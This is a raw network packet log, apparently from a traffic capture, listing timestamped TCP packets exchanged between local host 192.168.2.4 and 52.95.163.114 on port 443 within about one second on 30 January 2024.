                                                                            Jan 30, 2024 13:32:42.963382959 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963392973 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963406086 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963421106 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963433027 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963440895 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963475943 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963506937 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963530064 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963548899 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963586092 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963592052 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963614941 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963638067 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963804960 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963824034 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963861942 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963867903 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.963903904 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.963929892 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964145899 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964165926 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964204073 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964210987 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964247942 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964266062 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964298010 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964318037 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964339018 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964380980 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964385986 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964396954 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964422941 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964430094 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964437962 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964452982 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964492083 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964632034 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964654922 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964685917 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964692116 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964708090 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964739084 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964771032 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964791059 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964827061 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964833021 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964848995 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964870930 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964874029 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964884043 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964901924 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964930058 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964951992 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964955091 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.964965105 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.964989901 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965003967 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965034962 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965039015 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965082884 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965178967 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965229988 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965276957 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965327024 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965333939 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965346098 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965368032 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965416908 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965416908 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965426922 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965436935 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965449095 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965467930 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965552092 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965572119 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.965585947 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.965621948 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206352949 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206391096 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206402063 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206418037 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206440926 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206453085 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206460953 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206480980 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206492901 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206509113 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206518888 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206526041 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206542015 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206584930 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206585884 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206604004 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206609964 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206629992 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206644058 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206661940 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206669092 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206691027 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206701994 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206707001 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206717014 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206741095 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206756115 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206765890 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206783056 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206789970 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206799984 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206813097 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206820011 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206835985 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206854105 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206886053 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206891060 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206902981 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206928968 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206942081 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206954002 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.206959009 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.206980944 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207005978 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207027912 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207047939 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207093954 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207101107 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207118034 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207127094 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207150936 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207178116 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207187891 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207226038 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207237959 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207237959 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207257032 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207274914 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207293034 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207303047 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207314014 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207341909 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207351923 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207371950 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207397938 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207406044 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207422972 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207439899 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207444906 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207453966 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207480907 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207489967 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207509041 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207516909 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207530975 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207542896 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207551956 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207559109 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207566023 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207596064 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207617044 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207624912 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207633018 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207648993 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207673073 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207694054 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207700014 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207714081 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207736015 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207748890 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207755089 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207782984 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207787037 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207812071 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207869053 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207873106 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207870007 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207870007 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207894087 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207906961 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207928896 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207964897 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.207973957 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.207998037 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208030939 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208046913 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208060980 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208069086 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208092928 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208096981 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208106995 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208126068 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208158016 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208161116 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208175898 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208194017 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208213091 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208221912 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208225965 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208244085 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208249092 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208275080 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208281040 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208281040 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208288908 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208303928 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208333015 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208336115 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208347082 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208363056 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208374023 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208394051 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208399057 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208416939 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208417892 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208445072 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208445072 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208457947 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208478928 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208511114 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208523989 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208544016 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208574057 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208580017 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208595037 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208604097 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208620071 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208626032 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208642960 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208659887 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208690882 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208697081 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208709002 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208728075 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208734989 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208746910 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208766937 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208794117 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208803892 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208823919 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208851099 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208857059 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208874941 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208879948 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208906889 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208908081 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208925009 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.208960056 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.208978891 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209001064 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209021091 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209048986 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209054947 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209081888 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209081888 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209090948 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209098101 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209119081 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209136963 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209146023 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209162951 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209175110 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209187031 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209194899 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209223032 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209230900 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209253073 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209295988 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209296942 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209305048 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209320068 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209330082 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209352970 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.209361076 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.209366083 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248579025 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248584986 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248600006 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248605013 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248624086 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248630047 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248656034 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248663902 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248708963 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248709917 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248724937 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248740911 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248764992 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248770952 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248784065 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248792887 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248806953 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248827934 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248842955 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248847008 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248883009 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248899937 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248923063 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248953104 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248959064 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248970032 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.248975039 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.248999119 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249003887 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249018908 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249025106 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249056101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249075890 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249100924 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249130011 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249135971 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249155998 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249155998 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249171972 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249181986 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249198914 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249200106 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249227047 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249233007 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249253035 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249262094 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249279976 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249284983 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249300003 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249314070 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249346018 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249358892 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249378920 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249406099 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249412060 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249428034 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249437094 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249450922 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249456882 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249476910 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.249486923 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249504089 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.249509096 CET4434973552.95.163.114192.168.2.4
